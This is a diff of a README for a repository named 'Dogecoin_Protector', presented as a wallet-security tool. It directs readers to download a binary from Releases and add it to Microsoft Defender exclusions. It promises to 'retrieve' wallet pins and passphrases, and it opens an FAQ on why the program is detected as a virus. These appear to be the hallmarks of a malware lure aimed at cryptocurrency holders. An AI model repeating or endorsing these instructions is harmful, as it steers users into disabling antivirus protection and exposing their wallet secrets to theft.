DavidDadd/Dogecoin_Protector/README.md

 Please download the application from the 'Releases' section of our repository.
 Place the application in a designated folder of your choice for easy access.
 Please add the folder and the program to Exclusions of Microsoft Defender anti-virus scans.
 Once situated, you may proceed to run the application.

 **Get Started**:
 Activating and utilizing the tool is a straightforward process.
-Simply follow the on-screen instructions upon launch to securely generate or retrieve your wallet pin.
+Simply follow the on-screen instructions upon launch to securely generate or retrieve your wallet pin/passphrase.

 Secure your cryptocurrency transactions today with Dogecoin_Protector.

 # Demonstration video
 *https://youtu.be/4tbvd3SXS0Q*
+The version of Dogecoin Protector in the video is not latest version

 # FAQ
 **Q1:** Why is it detected as a **virus** by my computer?